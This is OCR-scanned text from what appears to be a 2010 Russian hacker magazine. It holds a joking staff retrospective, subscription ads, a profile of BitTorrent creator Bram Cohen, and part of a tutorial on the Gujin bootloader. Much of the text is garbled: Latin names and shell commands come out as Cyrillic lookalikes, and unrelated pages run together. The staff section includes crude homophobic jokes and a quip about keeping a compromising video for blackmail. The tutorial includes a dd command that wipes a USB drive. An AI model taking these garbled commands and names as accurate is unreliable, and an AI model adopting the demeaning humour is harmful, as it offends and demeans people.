Крис и Евгений при встрече немедленно анни- 
гилируютс выделением огромного количества 
энергии), найти подходы к командам вроде 



в интернетах, что среди некоторых его пользо- 
вателей Хакер только сними ассоциируется. 
Кстати говоря, писал Даня втом числе статьи, не 
содержащие в себе мощного некросодомичес- 
кого заряда — материалы вроде «АІ : ЭкуІЧеІ: или 
Пи качу» тому примером. 

Спустя четыре года энергия артефакта нача- 
ла иссякать, подтачивая его Волю, Ловкость 
и Сопротивление Магии, в результате чего 
Даня поддался на происки злых конкурентов, 
соблазнивших его вышеуказанным золотом 
и девственницами, в результате чего цс 
лишился своего главного хумориста, а мы, 
оставшиеся члены Х-Сгеѵѵ, как раз органи- 
зовавшие прямое общение с читателями, 
опубликовав свои мобильные телефоны, 
начали постепенно прогибаться под шквалом 
з во н ко в и 5М5 примерно та ко го содержания: 
«Где Даня? Верните Даню! Даш аську Дани? 
Даш аську Форба? Даш аську Бублика! Риаль- 
но нада!». Спустя долгие годы Даня вернулся 



Метео, 5сіЛ-а, тОО, 
сБс и даже интересно 
(!) написать статью 
про исІаЛ.сопп . Из 
авторского сословия 
он очень быстро пе- 
рекочевал в когорту 
редакторов, приняв 
под свое командова- 
ние рубрику«Сцена» 

(в которой командо- 
вал в основном собой), 
а вскоре — мета ста - 
зировал в рубрику 
«Креатифф», которую заполнял исключительно 
собой. Что справедливо — креативы кроме 
него все равно никто писать неумел. Название 
«Креатифф» было выбрано неслучайно — 
ведь вте мрачные времена в интернетах был 
очень популярен «ресурс Удава», на котором 
тусовалось огромное количество личностей, 
ободренных новой модой, которая постано- 
вила, что в XXI веке стало можно писать по 
принципу «как слышится — так и пишется, а то 
и даже хуже». Так вот, среди этих зловредных 
личностей присутствовал и некий тіпбѵѵОгк. 
Кроме подвигов на нивежурналистики, Олег 
запомнился нам своим увлечением бильярдом 
(насколько я понимаю, вполне монетизиро- 
ванноеувлечение), плавно перешедшим в не- 
сколько лет задротства в ММОЕРС (чему и был 



— но это был уже не тот Даня — мы считаем, 
что был созданный злобным колдуном гомун- 
кулус. Поэтому больше мы про Шеповалова 
ничего писать не будем, а лучше дадим слово 
ему самому. 

Диагноз: Даня — это Даня. Монстр хумора об- 
разца начала века, которого помнят и цитируют 
до сих пор. Сейчас он работает в РЕ-службе 
в ЕиТиЬе и держит портал для журналистов и 
пиарщиков МебіаЬипІег.ги. 

От себя ! Активно нес контркультуру в массы. 
Полагаю, донес и не расплескал. Судя по всему, 
буду гореть в аду в особой VI Р-ложе. 

Аоднажды я спас Синтеза от гибели. Мы были в 
питерском клубе «Мама» — это был лютый при- 
тон и рассадник порока. Ну и Синтез так много 
выпил чая и минералки, что пришлосьего 
отвести в туалет и поливать холодной водой. 
Синтез при этом повторял «Че-то мне п * ц ! » , а 
мыслью пребывал в Далеких Мирах Бодхисатв 
Будущего. 



посвящен его ЖЖ], от которого он в итоге смог 
излечиться, увлекшись в настоящее время 
покером. Которое, с его слов, тоже более-ме- 
нее себя окупает. 

Диагноз ! Официальный журналист Хакера. 
Человек, который знаеттолкв публицистике, 
интервью и онлайн-играх. О которых сейчас и 
пишет. Говорит, что мечтает написать на этутему 
толстую книгу без картинок. 

От себя 

Помнится, приютил на хате московскую деле- 
гацию из -г : Бублика, Хинта, Куттера, Олега. 
Записал компромат, где Бублик натурально 
дрючит по-гомосятски Хинта, видео до сих 
пор хранится у меня на компе. Может, если 
кто-то из них станет депутатом, пригодится для 
шантажа :). 
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ЬООЫікака Артем 

Аникин 

КОГДА ЗАРУЛИВАЛ: С 2004 ГОДА 

Жалобы I на злоупотребление алкоголем 
в течение длительного времени. 

Анамнез: 

Рядовой новосибирский старшеклассник, 
отнимающий у соучеников завтраки, деньги и 
мобильники, отрывающий крылья бабочкам, 
топчущий муравейники и целующий девочек — 
казалосьбы, какую рольон могсыграть в 
жизни т ? Элементарно, Ватсон! Во-первых, 
на моментустановления контакта сжурналом 
Артем уже вырос, выписался из школы и даже 
получил аттестат. Во-вторых, он перестал 
отниматьу подростков мелкие материальные 
ценности (никакого криминала, в Новоси- 
бирске, находящимся натерритории бывшей 
Гипербореи, такпринято], переехал в Москву и 
перешел на ценности виртуальные — зару- 
ливал на асечке ( азесбка.ги ). брутил уины, 
добывал шестизнаки, овладел пятизнаком (и 
до сих пор его не п рои мел], да и вообще зани- 
мался делами настолько темными, что не хочет 
о них говорить даже сейчас. Так или иначе, 
тогдашний редактор рубрики «Взлом» — 

Иван Петров ака СиТТег пригласил Бублика 
авторствовать в его рубрику, что вылилось 
(февраль2004 года] в написание вышеозна- 
ченным перцем статьи «Выгибаем большую 
лапу» про баги известного почтового сервера. 
После этого внезапно выяснилось, что Артем — 
не злой криминогенный хакер, а веселый 
парень, вечно молодой (тогда — 18 лет] и вечно 
пьяный, всегда готовый искрометно пошутить 
и выпить литр-другой 60% воды. А посколь- 
ку вте далекие времена вжурнале имел 
место острый недостаток юмористов (точнее, 
юмористами там были все, но вотнаписать что- 
либо смешное могтолько Даниил Шеповалов, 
который тогда, ксожалению, был похищен при- 
шельцами], именно Артем и начал заруливать 
Хумором в нашем журнале. Со временем сей 
студент МТУСИ (где он, кстати, учился вместе 
с СиТТег’ом и N50], благодаря своим могучим 



навыкам в области алкоголизма, прогулов 
семинаров, взлома и программного обеспе- 
чения, заджойнился в редакторы рубрики 
РС-20ЫЕ и некисло поднял ее интересность в 
глазахтех читателей, которые начали считать, 
что ее прежний редактор (М.Э.АзЫ — слишком 
стар, уныл и официален, чтобы делать рубрику, 
достойную внимания нашего активного и ха- 
керски-ориентированого читателя. Погоди, ты 



всерьез считаешь, что пьянство и прогулы я 
упомянул здесь для красного словца или, тем 
паче, для юмору? Вовсе нет, ведьтогда эти 
вещи назывались по-другому — дипломатия и 
тайм-менеджмент соответственно. 

Диагноз: 

Заметный чувак. Внес порядочный вклад в 
развитие журнала, особенно — в общение с 
читателями, показав им примертогдашнего 
ксакепа — молодого, дерзкого и веселого. 
Нынче — поднялся, открыл свое дело, с жур- 
налистикой и хаком не связанное — держит 
тату-салон в центре Москвы. 

От себя: 

Вот и все, что сказал мне Бублик в ответ на 
присланный ему этоттекст: «аххаах». 



>йѴО: Саиііоп! Но* сопіепі! / Обережно, гарячо! 

На нашем диске тебя ждет царский бонус размером с сиденье от унитаза, тьфу, точнее, 
только что прочитанную тобой статью: полный текст интервью со всеми упомянутыми 
в статье т -мэнами. 



ЗАКЛЮЧЕНИЕ 

Вот и подошла к концу наша историческая ста- 
тья. Еслиты читаешьжурнал недавно — считай, 
что ты ознакомился с великими скрижалями ~і~ :1. 
Если давно — все равноузнал много нового, 



поскольку я и сам был удивлен некоторым 
подробностям жития старых коллег и тем 
метаморфозам, которые произошли с ними к 
2010-му году. Разумеется, за рамками статьи 
остались т -мэны современности — хотя боль- 



шинство из них работают вжурнале кучулет и 
весьма заметны (взять хотя бы Горла, который 
являетсобой красивейший стереотип крутого 
программиста-хардкорщика]. Ну ничего, и про 
нас когда-нибудь напишут :]. ц-ц 



► 078 
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ПОДПИШИТЕСЬ 

$Нор.дІс.ги 



Подписка - это: 

■ Выгода ■ Гарантия ■ Сервис 



іВ 

2 

< 

О 



СТРАНА 



ИГР 





вювносѴг. 



бмес. 1300 руб. 
12 мес. 2300 руб. 





Призер фестивалей 



бмес. 912руб. бмес. 1080руб. 

12мес. 1656 руб. 12мес. 1960 руб. 





выходит 2 раза в месяц 

бмес. 2400руб. 
12мес. 4400 руб. 




оиохРЕпт 
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бмес. 1200 руб. 
12мес. 2200 руб. 
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б мес. 1 056 руб. 
1 2 мес. 1 920 руб. 



6 мес. 747 руб. 
12 мес. 1350 руб. 




б мес. 792 руб. 

1 2 мес. 1 440 руб. 



3 мес. 630 руб. 
бмес. 1140 руб. 




б мес. 890 руб. 
12 мес. 1630 руб. 
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6 мес. 1 200 руб. 
12 мес. 2100 руб. 
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ФОРСПШ 




6 мес. 726 руб. 6 мес. 600 руб. 

12 мес. 1320 руб. 12 мес. 1080 руб. 




б мес. 1 200 руб. 
12 мес. 2100 руб. 




б мес. 990 руб. 

1 2 мес. 1 790 руб. 




СИЛА В ТУРНЕ! 
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Моипіаіп 

Віке 




только на сайте 

4 мес. 628 руб. 

8 мес. 1136 руб. 




только на сайте 

4 мес. 464 руб. 
8 мес. 848 руб. 




только на сайте 

4 мес. 556 руб. 

8 мес. 1008 руб. 



ИаМаІ 




6 мес. 774 руб. 
12 мес. 1404 руб. 




Вышивают 
— крестиком 




б мес. 564 руб. 
12 мес. 1105 руб. 




(дате)іамі 

МЕДИА ДЛЯ ЭНТУЗИАСТОВ 














ГОЛОВОЛОМКА 

ТОРРЕНТОВ 

О БРЭМЕ КОЭНЕ. 
СОЗДАТЕЛЕ 
ПРОТОКОЛА 
ВІТТОККЕИТ 

БРЭМ КОЭН -КЛАССИЧЕСКИЙ 
ГИК. НАСТОЛЬКО 
КЛАССИЧЕСКИЙ. ЧТО ЕГО 
МОЖНО ИСПОЛЬЗОВАТЬ 
В КАЧЕСТВЕ ИЛЛЮСТРАЦИИ К 
ЭТОМУ ПОНЯТИЮ 
В ЭНЦИКЛОПЕДИЯХ. 

НАВЕРНОЕ. ПОЭТОМУТАК 
СЛОЖНО ПОВЕРИТЬ. ЧТО 
ЭТОГО СПОКОЙНОГО ПАРНЯ, 
КОТОРЫЙ ПИТАЕТ НЕЖНУЮ 
ЛЮБОВЬ К ГОЛОВОЛОМКАМ 
И ОРИГАМИ, ЛЮТО НЕНАВИДЯТ 
ВСЕ ПРАВООБЛАДАТЕЛИ НА 
ПЛАНЕТЕ- ЕЩЕ БЫ. ВЕДЬ 
ИМЕННО ОН ПРИДУМАЛ 
ПРОТОКОЛ ВІТТОРРЕМТ, 
ОКОНЧАТЕЛЬНО СПУСТИВ 
ПИРАТСТВО С ПОВОДКА. 




I/ 
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ГЕНИИ НЕ ЛЮБЯТ ШКОЛУ 

Откуда вообще берутся все эти «новые тех- 
нологии»? Они явно не растут на деревьях и 
не размножаются почкованием, их придумы- 
вают люди, и, как правило, очень необычные 
личности. Ты только вдумайся, каким нужно 
быть гиком, чтобы с нуля, из головы, измыслить 
принципиально новый гаджет или не имеющую 
никаких а налогов технологию. Неудивительно, 
что таких гениев обычно величают психами 
и зачастую прижизни онитаки не находятни 
единомышленников, ни признания. 

Нашему сегодняшнему герою повезло несколь- 
ко больше «собратьев по разуму» — свое место 
в этой жизни Брэм Коэн нашел, да и с при- 
знанием дела тоже обстоят неплохо, хотя, как 
было сказано выше, его можно использовать 
в качестве иллюстрации к понятиям «гик» или 
«нерд». Родился Брэм в 1975 году, в Соединен- 
ных Штатах, ясное дело, Америки, и проявлять 
интерес кпрограммированию, математике и к 
другим, не совсем обычным для ребенка вещам, 
он начал в совсем юном возрасте. Тогда о стран- 
ностях Брэма никто особенно незадумывался, 
во всяком случае, вести его к психологу нужды 
не было. Напротив, за одаренного мальчика 
только радовались, да иногда беззлобно руга- 
лись — маленький Брэм обожал всевозможные 
головоломки, но хватало ихотсилы на полчаса. 
Кстати, он до сих пор способен собрать кубик 
Рубика за 2 минуты, практически машинально. 
Учился Коэн в том же городе, где появился на 
свет— в Нью-Йорке. Он посещал не простую 
школу, а именитое заведение с математичес- 
ко-научным уклоном — Зіііуѵезапі Нідб Зсбооі. 
Среди выпускников этой школы куча нобелев- 
ских лауреатов, докторов наук, ученых и других 
видных личностей. В интервью Брэм, однако, 
не раз признавался, что школу он ненавидел, и 
ему приходилось постоянно держать в голове 
напоминание самому себе, что сюда он пришел 
учиться, получатьзнания. Как нетрудно дога- 
даться, проблема крылась не в самой школе, а 
втом, что отношения со сверстниками не лади- 
лись, да и оценки Коэна, какни странно, тоже 
не достигали заоблачных высот. Брэм был спо- 
собен добиваться великолепных результатов в 
узких, интересныхлично ему сферах, например, 
в области любимой математики, но остальные 
предметы, те, что интересовали Брэма меньше, 
становились проблемой. Хуже того, отметки 
и успеваемость Коэн также относил к вещам 
неинтересным и маловажным, что, конечно, 
не могло не возмущать педагогов. Положение 
худо-бедно поправляли разве что его победы 
на всевозможных математических олимпиадах, 
коихза школьные годы набралось немало. 

О причинахсвоих«странностей» Коэнузнал 
только в зрелом возрасте, когда впервые 
наткнулся на упоминание и описание синдрома 
Аспергера (иногда его еще называютсиндро- 
мом Гиков, или Кремниевой долины]. Цитирую 
определение этого заболевания: «Синдром 
Аспергера — этотакназываемая форма 
высокофункционального аутизма, при котором 
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способность функционировать относительно 
сохранена. Лица с синдромом Аспергера встре- 
чаются редко, со стороны они не похожи на 
умственно отсталых и обладают, как минимум, 
нормальным, либо высоким интеллектом, но 
нестандартными или слаборазвитыми соци- 
альными способностями; часто из-за этого их 
эмоциональное и социальное развитие, а также 
интеграция происходят позже обычного». 

Узкие, интенсивные интересы, будучи поглощен 
которыми человекнезамечаетничего вокруг — 
это также одна из базовыххарактеристиксин- 
дрома Кремниевой долины, а Брэм подпадает 
практически под все его классические черты. 
Вместо общения со сверстниками в школьные 
годы он был поглощен изучением языков про- 
граммирования (в частности, Вазіс и основ С], 
которым в 6 лет его начал обучать отец. В конце 
80-х даже в престижной Зіиуѵезапі Нідб Зсбооі 
еще не было классов по программированию, так 
что почти все премудрости Брэму приходилось 
постигать самостоятельно, что, впрочем, его со- 
вершенно неудручало — фактически, програм- 
мировать Коэн начал уже к 10 годам. 

В 1993 году, окончив школу, Брэм поступает в 
университет Буффало, но вскоре бросаетучебу. 



Дело втом, что с возрастом он окончательно 
понимает, что ему оченьтяжелозаниматься 
вещами, которые он считает бессмысленными 
и неинтересными, а в колледже «ненужной 
информации» было слишком много. 

Бросив колледж, Брэм продолжаетучиться 
самостоятельно, плюс ищет работу. Эти поиски 
даже увенчались успехом, хотя требования 
он предъявлял не совсем стандартные. Коэн 
признается, что неспособен работать в фик- 
сированном графике, по часам, в компании, 
предъявляющей строгиетребования кдресс- 
коду, и категорически не может выполнять бес- 
смысленную и неинтересную работу. Этакими 
критериями найти место врядли было просто, 
но свою роль здесь сыграл бум доткомов, как 
раз пришедшийся на середину 90-х, начало 
2000-х годов. В то время талантливым програм- 
мистам были рады во многих компаниях, даже 
если эти самые программисты с презрением 
относились кдресс-коду :). 

СДЕЛАТЬ ВСЕМ ХОРОШО 

В последующие годы Коэн успел поучаствовать 
в работе целого ряда стартапов и, конечно, 
почерпнул немало опыта и знаний, в частности 
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ПОМИМО ПРОЧЕГО, КОЭН ЕЩЕ И ОТЕЦ СЕМЕЙСТВА— ТРОЕ ДЕТЕЙ, НЕ ШУТКИ! 



его арсенал языков пополнили 
РуіЬоп и баѵа. Но наиболее инте- 
ресным для нас и для истории стал 
его последний проект, над которым 
Брам трудился в компании с гово- 
рящим названием «Еѵіі Сепіизез 
іюга ВеиегТотоггоѵѵ». Совместно 
с Джимом МакКоем, основателем 
«Злых гениев ради светлого буду- 
щего», он корпел над разработкой 
открытой технологии пиринговой 
дистрибуции контента МорЫабоп. 
Происходило это в 1 999-2001 
годах, реег-То-реегсети на тот 
момент уже успели заявить о 
себе, заставив правообладателей 
занервничать; уже разгорался 
конфликт вокруг Ыарзіег, и вот-вот 
должны были появиться Ка2аа, 



СпиТеІІа и е0опкеу2000, подли- 
вая масла в огонь. Брэм кэтому 
времени уже довольно давно 
интересовался файлообменными 
технологиями и, по собственному 
признанию, «очень хотел создать 
что-то действительно полезное 
людям». 

Главной фишкой МорЫабоп долж- 
но было стать следующее: если 
человек захочет сохранить файл 
отлюбопытных глаз, но одновре- 
менно иметь его под рукой, то с 
помощью МорЫабоп он сможет 
разбить файл на множество мелких 
кусочков, зашифровать, и прога 
распределит их среди миллионов 
компьютеров, на которых она так 
же будетзапущена. 



Да, ребята явно что-то перемуд- 
рили, поэтому неудивительно, что 
МорЫабоп «не выстрелила» по- 
настоящему, но зато все это навело 
Брэма на интересную мысль. Коэн 
давно подметил, что загрузка и 
скачивание в файлообменных 
сетях вроде Ка2аа происходятс 
неравной скоростью — провайде- 
ры умышленно создавали эффект 
бутылочного горлышка, урезая 
скорость иріоасі’а. Получалось, 
что, когда два пира обменивают- 
ся большим файлом, например, 
копией фильма весом 700 Мб, по- 
лучающий льете прекрасной ско- 
ростью, этак 1 .5 Мб\с, а раздающий 
добивает разве что до 1 \1 0 этой 
отметки. То, что неплохо работало 



для трЗ и другой мелочевки, для 
больших файлов годилось стру- 
дом, и воттут-то Брэма и посетила 
идея, что, если разбить файл на 
мелкие кусочки и распределить их 
между несколькими аплодерами, 
это должно существенно поднять 
скорость и «сделать всем хорошо». 

ТОРРЕНТ-БЕЗУМИЕ 

В апреле 2001 года Коэн оставляет 
работу в «Еѵіі Сепіизез Іога ВеІЧег 
Тотоггоѵѵ» и начинает новый этап 
в своей жизни, который он сам ок- 
рестил периодом «бедного худож- 
ника» —жить тогда приходилось 
за счетскудных сбережений. 

Он целыми днямиторчит дома и 
программирует, несмотря на то, что 



мало кто из друзей и близких верит 
в успех его затеи. Впрочем, ска- 
зать, что в Брэма не верил совсем 
никто, значило бы соврать. Напри- 
мер, его жена Дженна, вспоминая 
тот период, вообще сравнивает 
его с Моцартом, дескать, он писал 
свою музыку также, как Брэм — на 
одном дыхании, стремительно, 
словно его руку направлял сам 
господь Бог. Согласно всетой же 
Дженне, Брэм могпочти весьдень 
бесцельно слоняться по дому, из 
кухни в комнату, а потом внезапно 
пойти, сесть за компьютер и начать 
потоком выдавать код, чистый, 
рабочий код. 

Сам Коэн, какправило, вспомина- 
етто время сулыбкой и замечает, 
что с ним подобное происходит 
нередко — он частенько прос- 
то знает, что прав и, никого не 
слушая, работает над задуманным. 



В случае с ВііТоггепГом Брэм как 
раз был в себеуверен и знал, что 
отлично управляется с написани- 
ем протоколов. 

Чутье не подвело камрада Коэна — 
протокол был практически готов 
уже летом 2001 года, во всяком 
случае, проведение беты и первый 
егозапусксостоялись 1 июля 2001. 
Кстати, интересный факт — для 
тестирования ВіЕГоггепТ Брэм 
собрал немалую пачку порнухи, 
которую и раздавали туда-сюда :). 
Каковы особенности торрентов, ты, 
думаю, прекрасно знаешь и сам, но 
все же обозначу основные черты: 
децентрализованная структура 
сети; скачивание информации 
практически без очередей; 



отличная скорость; пиры могут за- 
качивать насколько файлов, а сами 
файлы разбиты на небольшие 
фрагменты; обмен информацией 
между пирами происходит по пра- 
вилу «ты — мне, я — тебе» («Оіѵе 
апб уе збаіі геееіѵе» — настоящий 
девиз Брэма Коэна). 

Широкой аудитории свою разра- 
ботку, то есть протокол и первый 
ВіТТоггепТ-клиент, Брэм предста- 
вил в 2002 году, на первой еже- 
годной хакерской конфе СобеСоп, 
которую он сам же и организовал, 
совместно со своим бывшим сосе- 
дом по комнате Лэном Сассманом. 
Публике ВбТоггепТ был подан как 
ОрепБоигсе-продукт, ориенти- 
рованный на хардкорных гиков, 
например, предполагалось, что 
линуксойдам будеточеньудобно 
распространять с его помощью по 
сети свой софт. Но все повер- 
нулось несколько иначе... Нет, 
компьютерщики, конечно, быстро 
оценили плюсы и удобства нового 
протокола, и сарафанное радио 
принялось распространять по 
Сети благую весть о ВТТоггепТ, но 
за какой-то год взорвать интернет 
«БитТорренту» удалось благода- 
ря стараниям пиратов и кино- и 
сериало-манов. Дело в том, что 
раньше на закачку новой серии 
любимого телешоу у них уходили 
часы, а теперь счет шел на минуты. 
Товарищи пираты, в свою очередь, 
оценили другие удобства новинки, 
и принялись активно выкладывать 
в ВбТоггепТ вкусное и интересное. 
Преимущества были очевидны, 
и миллионы юзеров поспешили 
оценить их лично. 

Конечно, нельзя забывать о 
главном: самым большим плюсом 
ВТТоггепТ все же была и остается 
его децентрализованность — вто 
время, когда другие файлообмен- 
ные сети терпели крах под напо- 
ром правообладателей, прижать 



ПРОТОКОЛ БЫЛ ПРАКТИЧЕСКИ ГОТОВ УЖЕ ЛЕТОМ 
2001 ГОДА, ВО ВСЯКОМ СЛУЧАЕ, ПРОВЕДЕНИЕ БЕТЫ И 
ПЕРВЫЙ ЕГО ЗАПУСК СОСТОЯЛИСЬ 1 ИЮЛЯ 2001 . 






торренты оказалось практически невозможно. 
Брэма Коэна судить оказалось решительно не 
за что (хотя такие мысли, конечно, посещали 
медиа магнатов), а никакой иной «головы»у 
ВіПоггепІ не имелось. Слабым звеном в це- 
почке оказалисьтрекеры, которым в послед- 
ние годы и достается оптом, за всех и вся, но 
благодаря открытости технологии противосто- 
яние «копирасты Ѵ5. торрент-трекеры» скорее 
напоминает войну с ветряными мельницами 
или битву с гидрой — на месте отрубленной го- 
ловы незамедлительно вырастают две новые. 
Сказать, что Брэм Коэн не ожидал такого 
резонанса и такой популярности, значило 
бы не сказать ничего. Брэм был шокирован 
происходящим и долго не мог поверить, что все 
это имеет место на самом деле. В начале 2003 
года он даже успел снова устроиться на работу, 
подавшись в игростроительную компанию Ѵаіѵе 
(да -да, «НаО-Ше»), но успех «БитТоррента» 
спутал Брэму все карты. Дело дошло до смеш- 
ного — признательныеторрент-юзеры щедро 
жертвовали Коэну деньги через РауРа I, указан- 
ный на его сайте, и суммы этих пожертвований 
были таковы, что все семейство Коэнов, а это 
Брэм, его жена и трое детей, могло спокойно 
и хорошожить на одни только эти средства. 
Впрочем, чемуудивляться, если к концу 2003 
года ВіГГоггепІуже был скачан порядка 20 млн. 
раз. Коэн признается, что представить себета- 
кое количество людей ему сложно и даже жутко. 
Он говорит, что старается вообще об этом не 
думать, предпочитая размышления о коде или о 
любимых зубодробительных паззлах. 

НЕРАЗРЕШИМАЯ ГОЛОВОЛОМКА 

Из Ѵаіѵе Брэм уволился в 2004-м, проработав 
там около года. На этот раз он не стал искать 
новую работу и не пожелал вновь возвращаться 

МАКЕТ ГОЛОВОЛОМКИ ЗА АВТОРСТВОМ БРЭМА 




СВОИ ГОЛОВОЛОМКИ БРЭМ ПРОДАЕТ 

кстилюжизни «свободного художника». Вмес- 
то этого он со своим братом Россом Коэном и 
бизнес-партнером Эшвином Нэвином основал 
компанию ВііТоггепІ: I пс. , на благо которой 
трудится по сей день. 

Компания Коэна занимается нехитрым биз- 
несом — продолжает поддерживать, совер- 
шенствовать и распространять сам ВіПоггепІ, 
а также предлагает платный для крупных 
клиентов (и по-прежнему бесплатный для про- 
стых юзеров) сервис ВііТоггепІ РИА (Оеііѵегу 
Ыеіѵѵогк Ассеіегаіог) и комплект средств разра- 
ботки ВііТоггепіБоІІѵѵаге Оеѵеіортепі: КК. 

Дела у предприятия идут неплохо. Так, в 2005 
году в ВИТоггепІ Іпс. вложился крупный инвес- 
тор Дэвид Чао, после чего МРАА (Американская 
ассоциация кинокомпаний) поспешила заклю- 
чить с Коэном и партнерами сделку, согласно 
которой с официального сайта ВіГГоггепІ были 
убраны все ссылки на нелегальный контент, и 
воцарились дружба и мир. 

На самом деле, правообладатели с радостью 
утопили бы Брэма вместе с его разработкой, да 
только они упустили момент, воюя с другими 
пиринговыми сетями. К тому же, доказать, что 




БРЭМ КОЭН 



Коэн изобрел, или делает что-то нарушающее 
закон, оказалось практически невозможно — 
отвлеченно рассматривая ВіПоггепІ просто как 
протокол, кактехнологию передачи данных, 
ничего нелегального в нем найти нельзя. 
Вообще, Брэм Коэн, наверное, единственный, 
кто остался в стороне от праздника вседозво- 
ленности и веселого хаоса, который торренты 
посеяли в Сети. Он никогда не скачивал 
ничего нелегального, во-первых, потому 
что не слишком одобряет весь сегодняшний 
пиратский бум, во-вторых, потому что очень 
хорошо понимает — МРАА, РІАА и прочие 
организации будуттолько рады, если он это 
сделает. «Нив коем случае не хочу давать им 
повод, они наверняка только этого и ждут», — 
говорит Коэн, и с ним трудно не согласиться. 
Впрочем, Брэм, какобычно, неунывает, более 
того, нельзя сказать, что торренты сильно 
нужны своему создателю — любимые шоу и 
фильмы он предпочитает покупать на ОѴО, 
кабельного у него нет вообще, телевизор он 
не смотрит, а компьютеры ненавидит. Нет, это 
не шутка и не опечатка, Брэм действительно 
часто и совершенно искренне заявляет о том, 
что компьютеры настоящее зло, он терпеть их 
не может и надеется, что в будущем они станут 
удобнее и лучше, а он, в свою очередь, сделает 
для этого все возможное. А пока компьюте- 
ры по-прежнемутупые и противные, Брэм 
старается почаще от них отдыхать — он по сей 
день одержим головоломками, логическими 
играми, паззлами, жонглированием и ори- 
гами. Он «щелкает» головоломки десятками, 
проектируетсвои собственные и признает- 
ся, что не отказался бы зарабатывать этим 
на жизнь — сидеть дома и создавать вещи 
настолько сложные, что врядли кому-то, кроме 
него самого, удастся их решить. Очень инте- 
ресная мысль ведь, похоже, Брэм уже создал 
однутакую неразрешимую головоломку; имя 
ей ВіГГоггепІ и над тем, что с ней делать, уже 
больше 5 летломают головы все копирасты на 
нашей планете, ц-ц 
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Умный біціп, новаторский пеШооІте и ванильный 
Ьоо(.кегпе1.огд 



Скажи, какты относишься ктому, чтобы обзавестись бутлоадером, ко- 
торый нетребует настройки и умеет самостоятельно искать ОС на твоем 
жестком диске? А кактебе идея загрузки всегда свежей версии ОС через 
интернет, без необходимости ееустановки, обновления и восстановле- 
ния в случае сбоя? Заманчиво? Тогда читай дальше, твоему вниманию 
будет представлен умный загрузчик Сцііп, а также онлайновые сервисы 
пеіЬооТте и ЬооТкегпеІ.огд . 



ошш.умныйзверь 

Ыбо дал І_іпих возможность бытьзагруженным, 
Сгиб позволил избавиться от необходимости 
перезаписи загрузчика после изменения 
конфигурационного файла, а Сщіп [ ЬФрУ/дщт. 
зоигсеЬгде.пеІ: ) нетребует ни перезаписи за- 
грузчика, ни конфигурационного файла. Клю- 
чевая особенность этого загрузчика — автома- 
тический анализ разделов и файловых систем 
в поисках Ыпих-ядер, образов загрузочных 
дисков (*.ЬсШ и 150-образов без необходимости 
ручной настройки. 

Фактически Оіфп вообще не имеет конфигу- 
рационного файла. Все, что нужно сделать для 
добавления нового ядра в загрузочное меню — 
просто скопировать его в каталог/ЬооТ Всю 
остальную работу за грузчик сделает во время 
своей инициализации. При этом, если помимо 
Ыпих в твоей системе есть и другие ОС — они 
также будут добавлены в меню. 

Кроме жесткого диска, Ощіп может быть уста- 
новлен на самые разные накопители, такие 



какфлоппи-диски, ІІ5В-брелки, СО-ПОМ, 
50-карты. Особая версия загрузчика сущест- 
вует для операционной системы 005. Ощіп 
умеет напрямую загружать файлы ЕІ_Р32 и 
ЕІ_Р64, сжатые дгір, понимаеттакие файловые 
системы, какРАТ12, РАТ16, РАТ32, ехЕ2, ехД 
ех1:4 (с постоянным размером іпобе] и 150 9660. 
Он способен загрузитьоперационную систему 
практически с любого накопителя, даже будучи 
неустановленным на нем (например, загрузить 
ОС с ІІ5В-накопителя после загрузки с жестко- 
го диска). 

Автор загрузчика прикладывает все усилия, 
чтобы его детище оставалось максимально 
совместимым с самыми разными операцион- 
ными системами. Во-первых, Ощіп почти все 
время работаетв реальном режиме процес- 
сора, благодаря чему нетеряет возможности 
передавать управление другим загрузчикам, 
которые ожидаютточку вхождения в реаль- 
ном режиме, а также передавать управление 
загружаемым С0/0Ѵ0-П0М образам и отвечать 



на неизвестные прерывания ВІ05. Во-вторых, 
Ощіп не пытается установить страничный ре- 
жим памяти, таккакэто работа ядра: 64-битные 
ЕЕЕ-файлы должны поддерживать трансля- 
цию с32-х на 64 бита собственными силами. 
В-третьих, даже после перехода в защищенный 
режим Ощіп не активирует прерывания: это 
опять-таки должно делать ядро. 

Сщіп распространяется в виде исходных 
текстов и собранных пакетов почти для всех 
дистрибутивов Ыпих; получить их можно на 
страничке ЬФр://5оигсеФгде.пеі:/рго]ес1:5/ди]іп/ 
Іііез. Дистрибутивные пакеты предварительно 
упакованы в Фг.дг-архивы, поэтому перед 
установкой их придется извлечь: 

$ Цаг — Х 2 И с!еЬіап32 . Саг . дг 

$ зисіо сіркд -і диз іп_2 . 7_і3 86 . сіеЬ 

После окончания установки в каталоге/збіп 
появится исполняемый файл дщіп, с помощью 
которого производятся все манипуляции с 
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ТЬіе аііоыг ури ±а 'ЕхіІ' Г гот Ъооі.кегпеі .огд аЫ Ьооі 
іЬе тасЬіпе изіщ 11іе Іосаі Дізкз, сй'з, Порріез, 



Загрузочное меню Ьооі.кегпеі.ога 



С помощью 0 и ] і п легко создавать весьма 
нестандартные конфигурации для загрузки 
ОС ссамых разных носителей. Например, ты 
можешь разместить «вторую голову» загруз- 
чика в нужном тебе каталоге, просто выполнив 
команду: 



$ зисіо ди^іп /каталог/диз іп . еЬіоз 



Или расположить первую и вторую головы 
дщіп на разныхжестких дисках: 



$ зисіо ди^іп --тЬг-с1еѵісе= /сіеѵ/зсіа 
/тпС/зсПэ/ЪооС/диз іп . еЬіоз 



3. Удаление дщіп и восстановление предыду- 
щего загрузчика: 



$ зисіо ди^іп --гешоѵе /сіеѵ/зсіа 



Причем расширение .еЬіоз указывает на 
метод, который будет использовать первая 
голова дщіп для загрузки второй. Возможные 
варианты: Ьіоз, еЬіоз, ібесЬз, ісІеІЬа , апб іс!е148. 
О и] і п даже может проверитьтвой флоппи-диск 
на битые сектора и пересоздать файловую 
систему в случае их наличия: 

$ зисіо ди^іп --Гиіі /сіеѵ/ПсЮ 

После этого на флоппи-диске останется 
поместить дистрибутив и/или ядро и образ 
іпіігсі в каталог/ЬооЕ Чтобы Сщіп не выводил 
почем зря меню, используй флаг ‘-Е во время 
установки загрузчика. 

Для установки Сщіп на ІІЗВ-брелок достаточно 

ВЫПОЛНИТЬ: 

$ зисіо ди^іп --шЬг /сіеѵ/зсіс 

На устройстве будет создан один раздел с фай- 
ловой системой РАТ1 2/1 6/32 в зависимости от 
размера. В случае наличия таблицы разделов 
команда вернет ошибку, а флешку придется 
очистить с помощью команды сИ: 

$ зисіо сісі Ьз=512 соипС = б4 іГ=/сіеѵ/ 
2 его о :Е=/ сіеѵ/зсіс 



емая в меню выбора ОС, опции графического 
режима (например, активация режима ѴЕ5А], 
области поиска ядер и загрузочных дисков (на- 
